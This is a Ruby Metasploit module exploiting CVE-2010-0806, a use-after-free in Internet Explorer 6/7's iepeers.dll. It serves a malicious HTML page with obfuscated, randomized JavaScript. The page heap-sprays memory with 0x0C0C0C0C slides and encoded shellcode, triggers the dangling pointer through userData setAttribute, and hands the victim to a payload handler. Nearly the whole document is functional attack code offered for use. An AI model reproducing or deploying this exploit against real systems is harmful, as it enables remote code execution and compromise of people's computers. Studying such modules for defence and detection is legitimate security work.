## # ie_iepeers_pointer.rb # # Microsoft Internet Explorer iepeers.dll use-after-free exploit for the Metasploit Framework # # Tested successfully on the following platforms: # - Microsoft Internet Explorer 7, Windows Vista SP2 # - Microsoft Internet Explorer 7, Windows XP SP3 # - Microsoft Internet Explorer 6, Windows XP SP3 # # Exploit found in-the-wild. For additional details: # http://www.rec-sec.com/2010/03/10/internet-explorer-iepeers-use-after-free-exploit/ # # Trancer # http://www.rec-sec.com ##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft Internet Explorer iepeers.dll use-after-free', 'Description' => %q{ This module exploits a use-after-free vulnerability within iepeers.dll of Microsoft Internet Explorer versions 6 and 7. NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected. }, 'License' => MSF_LICENSE, 'Author' => [ 'Trancer <mtrancer[at]gmail.com>' ], 'Version' => '$Revision:$', 'References' => [ [ 'CVE', '2010-0806' ], [ 'OSVDB', '62810' ], [ 'BID', '38615' ], [ 'URL', 'http://www.microsoft.com/technet/security/advisory/981374.mspx' ], [ 'URL', 'http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day-attack-announced-cve-2010-0806/' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', 'InitialAutoRunScript' => 'migrate -f', }, 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00\x09\x0a\x0d'\\", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C } ] ], 'DisclosureDate' => 'Mar 09 2010', 'DefaultTarget' => 0)) end
def on_request_uri(cli, request) # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil)
# Encode the shellcode shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Set the return\nops ret = Rex::Text.to_unescape([target.ret].pack('V'))
# Randomize the javascript variable names j_shellcode = rand_text_alpha(rand(100) + 1) j_nops = rand_text_alpha(rand(100) + 1) j_slackspace = rand_text_alpha(rand(100) + 1) j_fillblock = rand_text_alpha(rand(100) + 1) j_memory = rand_text_alpha(rand(100) + 1) j_counter = rand_text_alpha(rand(30) + 2) j_ret = rand_text_alpha(rand(100) + 1) j_array = rand_text_alpha(rand(100) + 1) j_function1 = rand_text_alpha(rand(100) + 1) j_function2 = rand_text_alpha(rand(100) + 1) j_object = rand_text_alpha(rand(100) + 1) j_id = rand_text_alpha(rand(100) + 1)
# Build out the message html = %Q|<html><body> <button id='#{j_id}' onclick='#{j_function2}();' style='display:none'></button> <script language='javascript'> function #{j_function1}(){ var #{j_shellcode} = unescape('#{shellcode}'); #{j_memory} = new Array(); var #{j_slackspace} = 0x86000-(#{j_shellcode}.length*2); var #{j_nops} = unescape('#{ret}'); while(#{j_nops}.length<#{j_slackspace}/2) { #{j_nops}+=#{j_nops}; } var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace}/2); delete #{j_nops}; for(#{j_counter}=0; #{j_counter}<270; #{j_counter}++) { #{j_memory}[#{j_counter}] = #{j_fillblock} + #{j_fillblock} + #{j_shellcode}; } } function #{j_function2}(){ #{j_function1}(); var #{j_object} = document.createElement('body'); #{j_object}.addBehavior('#default#userData'); document.appendChild(#{j_object}); try { for (#{j_counter}=0; #{j_counter}<10; #{j_counter}++) { #{j_object}.setAttribute('s',window); } } catch(e){ } window.status+=''; }
document.getElementById('#{j_id}').onclick(); </script></body></html>|
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
# Transmit the compressed response to the client send_response(cli, html, { 'Content-Type' => 'text/html' }) # Handle the payload handler(cli)